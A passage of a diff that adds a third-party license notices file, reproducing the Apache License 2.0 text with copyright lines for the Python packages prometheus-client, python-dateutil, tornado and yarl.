+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+prometheus-client 0.12.0 - Apache-2.0
+
+
+Copyright (c) 2005-2016, Michele Simionato
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+python-dateutil 2.8.2 - Apache-2.0
+
+
+Copyright 2017
+copyright 2019
+Copyright (c) 2015- - dateutil contributors
+Copyright 2017- Paul Ganssle <paul@ganssle.io>
+Copyright (c) 2015- - Paul Ganssle <paul@ganssle.io>
+Copyright (c) 2014-2016 - Yaron de Leeuw <me@jarondl.net>
+Copyright (c) 2003-2011 - Gustavo Niemeyer <gustavo@niemeyer.net>
+Copyright (c) 2012-2014 - Tomi Pievilainen <tomi.pievilainen@iki.fi>
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+tornado 6.1 - Apache-2.0
+
+
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+yarl 1.7.2 - Apache-2.0
+
+
+copyright 2016-2018, Andrew Svetlov and aio-libs team
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
